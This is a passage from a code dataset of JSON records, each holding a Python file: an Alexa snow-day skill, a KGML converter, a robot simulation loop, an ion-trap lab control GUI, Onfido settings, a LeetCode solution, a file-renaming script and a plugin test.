\"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n        return handle_session_end_request()\n    else:\n        raise ValueError(\"Invalid intent\")\n\n# --------------- Functions that control the skill's behavior ------------------\n\n\ndef get_welcome_response():\n    \"\"\" If we wanted to initialize the session to have some attributes we could\n    add those here\n    \"\"\"\n\n    session_attributes = {}\n    card_title = \"Welcome to Snow Day Assistant\"\n    speech_output = \"You can ask for the likelihood of a snow day by saying, \" \\\n                    \"Snow Day Assistant, what are the chances of school tomorrow?\"\n    # If the user either does not reply to the welcome message or says something\n    # that is not understood, they will be prompted again with this text.\n    reprompt_text = \"You can ask, what are the chances of school tomorrow?\"\n    should_end_session = False\n    return build_response(session_attributes, build_speechlet_response(\n        card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n    card_title = \"Thanks for using Snow Day Assistant\"\n    speech_output = \"Thank you for using Snow Day Assistant. \"\n    # Setting this to true ends the session and exits the skill.\n    should_end_session = True\n    return build_response({}, build_speechlet_response(\n        card_title, speech_output, None, should_end_session))\n\n\ndef get_chances_of_school(intent, session):\n    \"\"\" Computes the likelihood of school closing tomorrow and prepares the\n    speech to reply to the user.\n    \"\"\"\n    card_title = \"Chances of school\"\n    session_attributes = {}\n    should_end_session = True\n\n    latlong = get_latlong()\n    snowAccumulation = get_snow_accumulation(latlong)\n    if snowAccumulation < 75:\n        likelyToClose = \"likely\"\n    elif snowAccumulation < 125:\n        likelyToClose = \"unlikely\"\n    else:\n        likelyToClose = \"very unlikely\"\n    speech_output = \"Chances of school tomorrow are \" + likelyToClose\n    reprompt_text = \"You can ask for the likelihood of a snow day by saying, \" \\\n                    \"Snow Day Assistant, what are the chances of school tomorrow?\"\n    return build_response(session_attributes, build_speechlet_response(\n        card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef get_snow_accumulation(latlong):\n    snowAccumulation = 0\n\n    response = urllib2.urlopen(\"https://earthnetworks.azure-api.net/data/forecasts/v1/daily?location=\" + latlong +\n                               \"&locationtype=latitudelongitude&units=english&cultureinfo=en-en&verbose=true&subscription-key=########################\").read()\n    parsed_json = json.loads(response)\n    forecasts = parsed_json['dailyForecastPeriods']\n    for dayForecast in forecasts:\n        today = datetime.strptime(\n            dayForecast['forecastDateUtcStr'], \"%Y-%m-%dT%H:%M:%SZ\")\n        today = today.strftime(\"%Y-%m-%d\")\n        tomorrow = datetime.strptime(\n            str(datetime.utcnow() + timedelta(days=1)), \"%Y-%m-%d %H:%M:%S.%f\")\n        tomorrow = tomorrow.strftime(\"%Y-%m-%d\")\n        if today == tomorrow:\n            snowAccumulation += dayForecast['snowAmountMm']\n\n    return snowAccumulation\n\n\ndef get_latlong():\n    response = urllib2.urlopen(\"http://freegeoip.net/json/\").read()\n    parsed_json = json.loads(response)\n    latlong = str(parsed_json['latitude']) + \",\" + str(parsed_json['longitude'])\n    return latlong\n\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n    return {\n        'outputSpeech': {\n            'type': 'PlainText',\n            'text': output\n        },\n        'card': {\n            'type': 'Simple',\n            'title': title,\n            'content': output\n        },\n        'reprompt': {\n            'outputSpeech': {\n                'type': 'PlainText',\n                'text': reprompt_text\n            }\n        },\n        'shouldEndSession': should_end_session\n    }\n\n\ndef build_response(session_attributes, speechlet_response):\n    return {\n        'version': '1.0',\n        'sessionAttributes': session_attributes,\n        'response': speechlet_response\n    }\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"202974010","text":"# -*- coding: utf-8 -*-\n\nimport click\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport json\n\n@click.command()\n@click.argument('kgmlid')\ndef main(kgmlid):\n    \"\"\"Console script for kgml2cyjs\"\"\"\n    click.echo(\"Replace this message by putting your code into \"\n               \"kgml2cyjs.cli.main\")\n    click.echo(\"See click documentation at http://click.pocoo.org/\")\n    kgml = requests.get('http://rest.kegg.jp/get/' + kgmlid + '/kgml').content\n    soup = BeautifulSoup(kgml, \"xml\")\n    # print(len(soup.find_all('entry')))\n    # print(len(soup.find_all('relation')))\n    # f = open(kgmlid + '.xml', 'wb')\n    # f.write(kgml)\n    # f.close()\n\n    d = {\n        \"format_version\": \"1.0\",\n        \"generated_by\": \"cytoscape-3.5.0\",\n        \"target_cytoscapejs_version\": \"~2.1\",\n        \"data\": {\n            \"shared_name\": \"Network\",\n            \"name\": \"Network\",\n            \"SUID\": 337,\n            \"__Annotations\": [],\n            \"selected\": \"true\"\n        },\n    }\n\n    elements = {}\n    nodes = []\n\n    entries = soup.find_all('entry')\n\n    for i, e in enumerate(entries):\n        # print(e[\"id\"])\n        data = {}\n        data[\"id\"] = e[\"id\"]\n        data[\"shared_name\"] = e[\"name\"]\n        data[\"name\"] = e[\"name\"]\n        data[\"SUID\"] = int(e[\"id\"])\n        data[\"selected\"] = \"false\"\n        tmp = {\"data\" : data, \"position\" : {\"x\" : int(e.graphics[\"x\"]), \"y\" : int(e.graphics[\"y\"])}, \"selected\" : \"false\"}\n        nodes.append(tmp)\n\n    elements[\"nodes\"] = nodes\n    elements[\"edges\"] = []\n    d[\"elements\"] = elements\n    # print(json.dumps(d))\n    with open(kgmlid + '.cyjs', 'w') as outfile:\n        json.dump(d, outfile, indent=2)\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"kgml2cyjs/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"463351210","text":"\nfrom PIL import Image\nimport numpy as np\nimport cv2\nfrom enum import Enum\nclass State(Enum):\n    simulate=\"0\"\n    newdata=\"1\"\n    action=\"2\"\n    reset=\"100\"\n    done_reset=\"102\"\n    def __str__(self):\n        return str(self.value)\ndef check_state():\n    f=open(\"state.txt\")\n    tmp=f.read() \n    if tmp!='':\n        return int(tmp)\n    f.close()\n\n    \ndef change_state(newstate):\n    try:\n        f=open(\"state.txt\",'w')\n        f.write(newstate)\n        f.close()\n    except:\n        pass\n\nchange_state(\"0\")\niterations=0\nwhile iterations<50: # done as an example: run 50 frames, then reset\n\n    if (check_state()==1) : \n        f= open(\"ultrasound.txt\")\n        ultrasound=f.read()\n        f.close()\n        f= open(\"lidar.txt\")\n        lidar=f.read()\n        f.close()\n        \n        f=open(\"actions.txt\",'w')\n        f.write(\"1.0\\n-1.0\") # left motor 1, right -1 => turn left; 1 1 => forward; -1 1 => backward\n        f.close()\n        change_state(\"2\")\n        iterations+=1\n        print(iterations)\n\nprint(\"reset\")\nchange_state(\"100\")  # reset the simulation\n# wait until the reset has finished\nwhile True:\n    if check_state()==102:\n        print(\"done resetting simulation\")  # the boat is back at the start of the level\n        break\n\n\n    \n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"57971871","text":"'''\n\nBoris Blinov Lab - Department of Physics, University of Washington, Seattle, WA 98105, USA\n\nOriginally written by Alex Kato\nModified by Raymond Lee\n\nThis python script allows the user to control the DAQ instrument through a window.\nCurrent capabilities include reading PMT data, changing settings, turning lasers on/off, and controlling the voltage output level.\n\n'''\n\n#### import needed packages ####\nimport nidaqmx as ni \nimport numpy as np \nfrom nidaqmx import constants\nfrom nidaqmx.stream_readers import CounterReader\nfrom nidaqmx import stream_writers\n\n#### customised versions for the lab\nfrom spinmob import egg\nimport pyqtgraph as pyqt \n\n#### constant initialisations #### needs to be moved to a separate file soon\nPMT_COUNTS_HOLD = np.zeros(500)\nPMT_COUNTS_RAW = np.zeros(500)\nPMT_COUNTS_AVERAGE = np.zeros(500)\nPMT_COUNTS_AVERAGE_HOLD = np.zeros(500)\nCOUNT_READ = np.zeros(2, dtype = np.uint32)\nCOUNT_HOLD = 0\nCOUNT_HOLD_AVERAGE = 0\n\n#### NI constant initialisation #### needs to be moved to a separate file soon\nSECONDS = ni.constants.TimeUnits.SECONDS\nLOW = ni.constants.Level.LOW\nHIGH = ni.constants.Level.HIGH\nsize = constants.READ_ALL_AVAILABLE\n\n#### Analog Output Tasks ####\ndef send_voltage(voltage_size):\n    VOLTS = ni.constants.VoltageUnits.VOLTS\n    AO0 = ni.Task()\n    AO0.ao_channels.add_ao_voltage_chan(\"Dev1/ao0\", \"ao0 level\", -10, 10, units = VOLTS)\n    AO0.start()\n    \n    global AO0_OUT\n    AO0_OUT = ni.stream_writers.AnalogSingleChannelWriter(AO0.out_stream)\n    AO0_OUT.write_one_sample(voltage_size)\n    voltage_lbl.setText(str(voltage_size))\n    \n    AO0.close()\n    \n#### Digital Out Tasks 0 ####\ndef initialise_DO0():\n    global DO0\n    global DO0_OUT\n\n    DO0 = ni.Task()\n    DO0.do_channels.add_do_chan(\"Dev1/port0/line0\", \"DO0_Laser\", constants.LineGrouping.CHAN_PER_LINE)\n\n    DO0.start()\n\n    print(\"P0.0 initialised as Digital Output\")\n\ndef set_DO0_high():\n    global DO0\n    DO0.write(True)\n    print(\"P0.0 set to 5V\")\n\ndef set_DO0_low():\n    global DO0\n    DO0.write(False)\n    print(\"P0.0 set to 0V\")\n\ndef close_DO0():\n    global DO0\n    DO0.close()\n\n#### Digital Out Task 1 ####\ndef initialise_DO1():\n    global DO1\n\n    DO1 = ni.Task()\n    DO1.do_channels.add_do_chan(\"Dev1/port0/line1\", \"DO1_Laser\", constants.LineGrouping.CHAN_PER_LINE)\n\n    DO1.start()\n\n    print(\"P0.1 initialised as Digital Output\")\n\ndef set_DO1_high():\n    global DO1\n    DO1.write(True)\n    print(\"P0.1 set to 5V\")\n\ndef set_DO1_low():\n    global DO1\n    DO1.write(False)\n    print(\"P0.1 set to 0V\")\n\ndef close_DO1():\n    global DO1\n    DO1.close()\n\n#### initialising PMT and exposure time set in ms ####\ndef initialise_PMT(exposure = 20):\n    global A\n    global PMT_COUNT\n    global TIMER1\n    global COUNT_READ\n    global PMT_COUNTS_RAW\n    global PMT_COUNTS_HOLD\n\n    RATE = (exposure*1e-3)**-1\n    PMT_COUNT = ni.Task()\n    TIMER1 = ni.Task()\n\n    ## creates an output channel to be used as an internal timer ##\n    TIMER1.co_channels.add_co_pulse_chan_freq(\"Dev1/ctr1\", \"PMT_TIMING\", freq = RATE)\n\n    TIMER1.timing.cfg_implicit_timing(sample_mode = constants.AcquisitionType.CONTINUOUS)\n    \n    PMT_COUNT.ci_channels.add_ci_count_edges_chan(\"Dev1/ctr0\", \"PMT_COUNTING\", initial_count = 0)\n    PMT_COUNT.timing.cfg_samp_clk_timing(rate = RATE, source = \"/Dev1/Ctr1InternalOutput\", sample_mode = ni.constants.AcquisitionType.CONTINUOUS)\n    A = CounterReader(PMT_COUNT.in_stream)\n    TIMER1.start()\n    PMT_COUNT.start()\n\ndef close_PMT():\n    PMT_COUNT.close()\n    TIMER1.close()\n\ndef settings_changed(*a):\n    settings.save()\n\n#### functions for digital logic on/off for P0.0 ####\ndef onoff_DO0(*a):\n    if settings[\"settings/Beam_Status/493_nm\"] == \"ON\" and DO0.read() == True:\n        set_DO0_low()\n        print(\"493 is OFF\")\n        settings[\"settings/Beam_Status/493_nm\"] = \"OFF\"\n\n    elif settings[\"settings/Beam_Status/493_nm\"] == \"OFF\" and DO0.read() == False:\n        set_DO0_high()\n        print(\"493 is ON\")\n        
settings[\"settings/Beam_Status/493_nm\"] = \"ON\"\n\n else:\n print(\"Error, 493 beam defaulted to OFF\")\n set_DO0_low()\n settings[\"settings/Beam_Status/493_nm\"] = \"OFF\"\n DO0_OnOff.set_checked(value = False)\n\ndef onoff_DO1(*a):\n if settings[\"settings/Beam_Status/650_nm\"] == \"ON\" and DO1.read() == True:\n set_DO1_low()\n print(\"650 is OFF\")\n settings[\"settings/Beam_Status/650_nm\"] = \"OFF\"\n\n elif settings[\"settings/Beam_Status/650_nm\"] == \"OFF\" and DO1.read() == False:\n set_DO1_high()\n print(\"650 is ON\")\n settings[\"settings/Beam_Status/650_nm\"] = \"ON\"\n\n else:\n print(\"Error, 650 beam defaulted to OFF\")\n set_DO1_low()\n settings[\"settings/Beam_Status/650_nm\"] = \"OFF\"\n DO1_OnOff.set_checked(value = False)\n\n#### data taking functions ####\ndef EXP_AV(X, Y):\n alpha = 0.5\n LEN = len(X)\n Z = np.zeros(LEN)\n Z[0: -1] = X[1:]\n SUM = 0\n for i in range(0, LEN):\n SUM += (1-alpha)**(LEN + 1 - i)*X[i]\n Z[-1] = alpha*(Y + SUM)\n return Z\n\ndef smooth(y, box_pts):\n box = np.ones(box_pts) / box_pts\n y_smooth = np.convolve(y, box, mode='same')\n return y_smooth\n\ndef ACQUIRE_PMT():\n global PMT_COUNTS_HOLD\n global PMT_COUNTS_RAW\n global COUNT_HOLD\n global COUNT_READ\n global A\n global PMT_COUNTS_AVERAGE\n global PMT_COUNTS_AVERAGE_HOLD\n\n try:\n A.read_many_sample_uint32(COUNT_READ, number_of_samples_per_channel = 2)\n new_val = np.average(COUNT_READ) - COUNT_HOLD\n PMT_COUNTS_RAW = EXP_AV(PMT_COUNTS_RAW, new_val)\n PMT_COUNTS_AVERAGE = smooth(PMT_COUNTS_RAW, 4)\n PMT_AVERAGE_DISPLAY = PMT_COUNTS_AVERAGE[1: len(PMT_COUNTS_AVERAGE) - 1]\n\n COUNT_HOLD = np.average(COUNT_READ)\n \n except:\n print(\"ERROR: Invalid source script.\")\n close_PMT()\n COUNT_HOLD=0\n initialise_PMT(settings[\"settings/Acquisition Settings/exposure\"])\n\n return PMT_AVERAGE_DISPLAY\n\n#### function for when the acquire button is pressed ####\ndef acquire_button_clicked(*a):\n global COUNT_HOLD\n\n if not PMT_ACQUIRE_BUTTON.is_checked():\n return\n \n close_PMT()\n num_box.set_value(0)\n print(\"Starting acuisition loop... 
\")\n\n initialise_PMT(settings[\"settings/Acquisition Settings/exposure\"])\n\n while PMT_ACQUIRE_BUTTON.is_checked() and (num_box.get_value() < settings[\"settings/Acquisition Settings/iterations\"] or settings[\"settings/Acquisition Settings/iterations\"] == 0):\n\n databox1.clear()\n databox2.clear()\n\n settings.send_to_databox_header(databox1)\n settings.send_to_databox_header(databox2)\n\n databox1['t'] = np.linspace(0, settings[\"settings/simulated_input/points\"]*(settings[\"settings/Acquisition Settings/exposure\"]), settings[\"settings/simulated_input/points\"])\n databox1[0] = ACQUIRE_PMT()\n current_count.setText(str(np.round(databox1[0][-1])))\n\n num_box.increment()\n\n databox1.plot(); databox1.autosave()\n databox2.plot(); databox2.autosave()\n\n win.process_events()\n \n PMT_ACQUIRE_BUTTON.set_checked(False)\n print(\"Acquisition stopped\")\n COUNT_HOLD = 0\n close_PMT()\n\ndef CLEAR_PMT_DATA():\n PMT_COUNT_RAW = np.zeros(500)\n PMT_COUNTS_AVERAGE = np.zeros(500)\n\n#### GUI section #####\n\"\"\" creating the main window \"\"\"\nwin = egg.gui.Window(autosettings_path = 'NIDAQTESTING.cfg')\n\n\"\"\" left side of the main window \"\"\"\nPMT_ACQUIRE_BUTTON = win.place_object(egg.gui.Button(\"Count Photons\", checkable = True)).set_width(135)\nnum_box = win.place_object(egg.gui.NumberBox(int = True)).set_width(50)\n\ntabs = win.place_object(egg.gui.TabArea(), row_span = 2, alignment = 0)\n\ncurrent_count = pyqt.QtGui.QLabel(\"No Data\")\nwin.place_object(current_count).setFont(egg.pyqtgraph.QtGui.QFont(\"Times Roman\"))\n\nwin.place_object(current_count, row = 3, column = 2)\n\nwin.new_autorow()\nsettings = win.place_object(egg.gui.TreeDictionary('NIDAQTESTINGSETTINGS.cfg'), column_span = 2)\n\nwin.new_autorow()\nDO0_OnOff = win.place_object(egg.gui.Button(\"493 On/Off\", checkable = True)).set_width(120)\nDO1_OnOff = win.place_object(egg.gui.Button(\"650 On/Off\", checkable = True)).set_width(120)\n\nsettings.add_parameter(\"settings/Acquisition Settings/iterations\", value = 0, type = 'int')\nsettings.add_parameter(\"settings/ simulated_input/channels\", value = 1, type = 'int', limits = (1, 8))\nsettings.add_parameter(\"settings/Acquisition Settings/exposure\", value = 20, type = 'float', limits = (0.001, None), dec = True, siPrefix = True, suffix = 'ms')\nsettings.add_parameter(\"settings/simulated_input/points\", value = 500, type = 'int', limits = (2, None))\nsettings.add_parameter(\"settings/simulated_input/Averaging\", value = 2, type = 'int', limits = (1, 200))\nsettings.add_parameter(\"settings/Beam_Status/493_nm\", value = \"OFF\", type = 'list', values = [\"ON\", \"OFF\"])\nsettings.add_parameter(\"settings/Beam_Status/650_nm\", value = \"OFF\", type = 'list', values = [\"ON\", \"OFF\"])\n\n\"\"\" tab 1 GUI \"\"\"\ntab1 = tabs.add_tab(\"PMT Signal\")\ndatabox1 = tab1.place_object(egg.gui.DataboxPlot(autosettings_path = 'NIDAQTESTp1.cfg'), alignment = 0)\n\n\"\"\" tab 2 GUI \"\"\"\ntab2 = tabs.add_tab(\"Analysis\")\ndatabox2 = tab2.place_object(egg.gui.DataboxPlot(autosettings_path = 'NIDAQTESTp2.cfg'), alignment = 0)\n\n\"\"\" tab 3 GUI \"\"\"\ntab3 = tabs.add_tab(\"Voltage Output\")\nbtn_reset = tab3.place_object(egg.gui.Button(\"RESET\", checkable = False)).set_width(50)\nbtn1v = tab3.place_object(egg.gui.Button(\"1V\", checkable = False)).set_width(50)\nbtn2v = tab3.place_object(egg.gui.Button(\"2V\", checkable = False)).set_width(50)\nbtn3v = tab3.place_object(egg.gui.Button(\"3V\", checkable = False)).set_width(50)\nbtn5v = 
tab3.place_object(egg.gui.Button(\"5V\", checkable = False)).set_width(50)\nvoltage_box = tab3.place_object(egg.gui.NumberBox(float = True)).set_width(50)\nvoltage_btn = tab3.place_object(egg.gui.Button(\"PIKA PIKA!\", checkable = False)).set_width(100)\nvoltage_lbl = tab3.place_object(pyqt.QtGui.QLabel(\"zéro.zéro at the moment...\"))\n\nsettings.load()\ninitialise_PMT(settings[\"settings/Acquisition Settings/exposure\"])\ninitialise_DO0()\ninitialise_DO1()\n\nset_DO0_low()\nset_DO1_low()\n\nsettings[\"settings/Beam_Status/493_nm\"] = \"OFF\"\nsettings[\"settings/Beam_Status/650_nm\"] = \"OFF\"\n\nbtn_reset.signal_clicked.connect(lambda: send_voltage(0))\nbtn1v.signal_clicked.connect(lambda: send_voltage(1.0))\nbtn2v.signal_clicked.connect(lambda: send_voltage(2.0))\nbtn3v.signal_clicked.connect(lambda: send_voltage(3.0))\nbtn5v.signal_clicked.connect(lambda: send_voltage(5.0))\nvoltage_btn.signal_clicked.connect(lambda: send_voltage(voltage_box.get_value()))\n\nPMT_ACQUIRE_BUTTON.signal_clicked.connect(acquire_button_clicked)\nDO0_OnOff.signal_clicked.connect(onoff_DO0)\nDO1_OnOff.signal_clicked.connect(onoff_DO1)\n\nsettings.connect_any_signal_changed(settings_changed)\n\ndef shutdown():\n    print(\"Closing but not destroying...\")\n    PMT_ACQUIRE_BUTTON.set_checked(False)\n    close_DO0()\n    close_DO1()\n    close_PMT()\n    return\n\nwin.event_close = shutdown\n\nwin.show(True)\n","sub_path":"ion-trap-scrippy-v2.py","file_name":"ion-trap-scrippy-v2.py","file_ext":"py","file_size_in_byte":11024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"551667468","text":"# -*- coding: utf-8 -*-\r\nimport requests\r\nimport traceback\r\nfrom datetime import datetime\r\n\r\n \r\ndef crossTaskUpload(serverIP, action, values):\r\n    try:\r\n        turl = \"http://%s:8080/ba/%s\"%(serverIP, action)\r\n        #values = {'comments': comments}\r\n        msgSession = requests.Session()\r\n        r = msgSession.post(turl, data=values)\r\n        print(r.text)\r\n    except Exception as e:\r\n        tstr = traceback.format_exc()\r\n        print(tstr)\r\n\r\ndef crossTaskUploadTest():\r\n    serverIP = '127.0.0.1'\r\n    #acton = 'addWeather.action'\r\n    #values={'siteId':1,'timeUtc':datetime.now(),'weather':'clear','temperature':0,'humidity':0,'cloudRatio':0,'windSpeed':0,'rainfall':0}\r\n    action = 'addInstrumentObservationHistory.action'\r\n    istId, skyId, obsStartTime, obsDuring, obsCtrRa, obsCtrDec, obsRadius, obsLfTpRa, obsLfTpDec, obsRtTpRa, obsRtTpDec, obsRtBmRa, obsRtBmDec, obsLfBmRa, obsLfBmDec = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0][:]\r\n    values = {'istId':istId, 'skyId':skyId, 'obsStartTime':obsStartTime, 'obsDuring':obsDuring, 'obsCtrRa':obsCtrRa, 'obsCtrDec':obsCtrDec, 'obsRadius':obsRadius, 'obsLfTpRa':obsLfTpRa, 'obsLfTpDec':obsLfTpDec, 'obsRtTpRa':obsRtTpRa, 'obsRtTpDec':obsRtTpDec, 'obsRtBmRa':obsRtBmRa, 'obsRtBmDec':obsRtBmDec, 'obsLfBmRa':obsLfBmRa, 'obsLfBmDec':obsLfBmDec}\r\n    crossTaskUpload(serverIP, action, values)\r\n\r\n \r\nif __name__ == \"__main__\":\r\n    \r\n    crossTaskUploadTest()","sub_path":"src/main/python/ValuesUpload.py","file_name":"ValuesUpload.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"539334758","text":"'''\nInput:\ngas = [1,2,3,4,5]\ncost = [3,4,5,1,2]\nOutput: 3\n-2, -2, -2, 3, 3\n-2, -4, -6, -3 0\n'''\nclass Solution:\n    def canCompleteCircuit(self, gas, cost):\n        if sum(gas) < sum(cost):\n            return -1\n\n        diffs = [g - c for g, c in zip(gas, cost)]\n        idx = None\n        balance = 0\n        for i, 
diff in enumerate(diffs):\n            if balance > 0:\n                balance = balance + diff\n            else:\n                balance = diff\n                idx = i\n\n        return idx","sub_path":"leetcode/py/134.py","file_name":"134.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"494452752","text":"# -*- coding: utf-8 -*-\n\"\"\"onfido settings.\"\"\"\nfrom os import getenv\n\nfrom django.conf import settings\n\n# the API HTTP root url\nAPI_ROOT = \"https://api.onfido.com/v2/\"\n\n# API key from environment by default\nAPI_KEY = (\n    getenv('ONFIDO_API_KEY', None) or\n    getattr(settings, 'ONFIDO_API_KEY', None)\n)\n\n# Webhook token - see https://documentation.onfido.com/#webhooks\nWEBHOOK_TOKEN = (\n    getenv('ONFIDO_WEBHOOK_TOKEN', None) or\n    getattr(settings, 'ONFIDO_WEBHOOK_TOKEN', None)\n)\n\n# Set to False to turn off event logging\nLOG_EVENTS = getattr(settings, 'ONFIDO_LOG_EVENTS', True)\n\n# Set to True to bypass request verification (NOT RECOMMENDED)\nTEST_MODE = getattr(settings, 'ONFIDO_TEST_MODE', False)\n\n\ndef DEFAULT_REPORT_SCRUBBER(raw):\n    \"\"\"Default report scrubber, removes breakdown and properties.\"\"\"\n    try:\n        del raw['breakdown']\n        del raw['properties']\n    except KeyError:\n        pass\n    return raw\n\n# function used to scrub sensitive data from reports\nscrub_report_data = (\n    getattr(settings, 'ONFIDO_REPORT_SCRUBBER', None) or\n    DEFAULT_REPORT_SCRUBBER\n)\n","sub_path":"onfido/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"615997511","text":"# coding:utf-8\r\n# Verify that a JSON string cannot carry binary data\r\n# TypeError: Object of type 'bytes' is not JSON serializable\r\n\r\nimport json\r\nimport chardet\r\nwith open('equal_test.py', 'rb') as f:\r\n    data = f.read()\r\n\r\nprint(type(data))\r\nprint(chardet.detect(data))\r\n\r\n# a = {'bool': True, 'int': 1, 'bin': data}\r\n# TypeError: Object of type 'bytes' is not JSON serializable\r\n\r\na = {'bool': True, 'int': 1, 'bin': data.decode('gbk')}\r\njstr = json.dumps(a, indent=2)\r\nprint(jstr)\r\n\r\njdata = json.loads(jstr)\r\nprint(jdata)\r\n\r\n","sub_path":"messy/python_basic/基本数据结构/json_test/二进制.py","file_name":"二进制.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"99773466","text":"#!/usr/bin python2.7\n#-*- coding: utf-8 -*-\nimport os\nimport time\n\n# The script must be placed in the directory whose files and folders\n# should have their names normalized.\nmain_path = os.path.dirname(os.path.abspath(__file__))\n\ndef folder_to_edit():\n    print(\"==========\\nThe current script will run on '\"+ main_path\n    +\"'.\\n==========\")\n\ndef syntaxing():\n\n    # Set up several flags to give the user control over what gets renamed\n    edit_check = 0\n    check_dir_to_edit = 0\n    check_files_to_edit = 0\n    edit_count = 0\n\n    for root, dirs, files in os.walk(main_path, topdown=False):\n        for name in dirs:\n            all_dir = os.path.join(root, name)\n            all_dir_new = os.path.join(root, name.replace(' - ', '_').replace(' ',\n                '_').replace('-', '_').replace('é', 'e').lower())\n            if all_dir != all_dir_new:\n                while check_dir_to_edit < 1:\n                    print(\"\\nDirectories below will be edited : \\n\")\n                    check_dir_to_edit=2\n                print(all_dir + \" ==> \" + all_dir_new)\n                edit_check += 1\n\n    for root, dirs, files in os.walk(main_path, topdown=False):\n        for name in files:\n            all_files = os.path.join(root, 
name)\n            all_files_new = os.path.join(root, name.replace('_-_','_').replace(' - ', '_').replace(' ',\n            '_').replace('-', '_').replace('é', 'e').lower())\n            if all_files != all_files_new:\n                while check_files_to_edit < 1:\n                    print(\"\\nFiles below will be edited : \\n\")\n                    check_files_to_edit = 2\n                print(all_files + \" ==> \" + all_files_new)\n                edit_check += 1\n\n    if edit_check == 0:\n        print(\"\\nSyntaxing is correct.\\nProgram exit.\")\n        exit()\n    else:\n        response = str(input(\"\\nContinue (y/n) \"\n                             \":\"))\n        waiting_user_response = 0\n        while waiting_user_response < 1:\n            if response == \"y\" or response == 'Y':\n                start_time = time.time()\n                for root, dirs, files in os.walk(main_path, topdown=False):\n                    for name in dirs:\n                        all_dir = os.path.join(root, name)\n                        all_dir_new = os.path.join(root,\n                        name.replace('_-_','_').replace(' - ', '_').replace(' ',\n                        '_').replace('-', '_').replace('é', 'e').lower())\n                        if all_dir != all_dir_new:\n                            os.rename(all_dir, all_dir_new)\n                            edit_count += 1\n                    for name in files:\n                        all_files = os.path.join(root, name)\n                        all_files_new = os.path.join(root, name.replace('_-_','_').replace(' - ',\n                        '_').replace(' ',\n                        '_').replace('-', '_').replace('é', 'e').lower())\n                        if all_files != all_files_new:\n                            os.rename(all_files, all_files_new)\n                            edit_count += 1\n\n                print(\n                    str(edit_count) + \" files or directories have \"\n                                      \"been edited with linux \"\n                                      \"syntaxing.\")\n\n                print(\"--- Executed in %s seconds ---\\n Program exit.\" % (time.time() -\n                                                                          start_time))\n                waiting_user_response += 1\n\n            elif response == 'n' or response == 'N':\n                print('Program exit')\n                exit()\n\n            elif response is None or response not in ['Y', 'y', 'N', 'n'] :\n                response = str(input(\"Please enter a valid option choice (\"\n                                     \"y/n) :\"))\n            else:\n                print('Program exit')\n                exit()\n\n\nif __name__ == \"__main__\":\n    folder_to_edit()\n    syntaxing()\n","sub_path":"linux_syntax.py","file_name":"linux_syntax.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"405556199","text":"from mock import Mock\n\nfrom cardinal.bot import (\n    CardinalBot,\n    user_info,\n)\n\nfrom . 
import game\nfrom .plugin import CAHPlugin\n\n\nclass TestPlugin:\n    def setup_method(self):\n        self.channel = '#cah'\n        self.player = 'player1'\n        self.user = user_info(self.player, 'user', 'vhost')\n\n        self.mock_cardinal = Mock(spec=CardinalBot)\n        self.mock_cardinal.nickname = 'Cardinal'\n\n        self.plugin = CAHPlugin(self.mock_cardinal,\n                                {'channel': self.channel})\n\n        self.plugin.game = game.Game()\n        self.plugin.game.add_player(self.player)\n\n    def test_play_wrong_channel(self):\n        channel = '#invalid-channel'\n        self.plugin.ready(self.mock_cardinal,\n                          self.user,\n                          channel,\n                          '.play')\n\n        self.mock_cardinal.sendMsg.assert_called_once_with(\n            channel,\n            \"Please start the game in {}!\".format(self.channel))\n\n    def test_choose_waiting_in_pm(self):\n        # when command sent in pm, respond in pm\n        self.plugin.choose(self.mock_cardinal,\n                           self.user,\n                           self.player,\n                           \".choose 1\")\n\n        self.mock_cardinal.sendMsg.assert_called_once_with(\n            self.player,\n            \"Please wait for your turn.\",\n        )\n\n    def test_choose_waiting_in_channel(self):\n        # when command sent in channel, respond in channel\n        self.plugin.choose(self.mock_cardinal,\n                           self.user,\n                           self.channel,\n                           \".choose 1\")\n\n        self.mock_cardinal.sendMsg.assert_called_once_with(\n            self.channel,\n            \"Please wait for your turn.\",\n        )\n","sub_path":"test_plugin.py","file_name":"test_plugin.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"16844629","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nExtract the features of the triangles and train the model.\r\n\"\"\"\r\n\r\nfrom tkinter.filedialog import askopenfilenames\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport re\r\nimport pickle\r\nimport numpy as np\r\nimport pandas as pd\r\nimport math\r\nfrom scipy import stats\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom matplotlib import 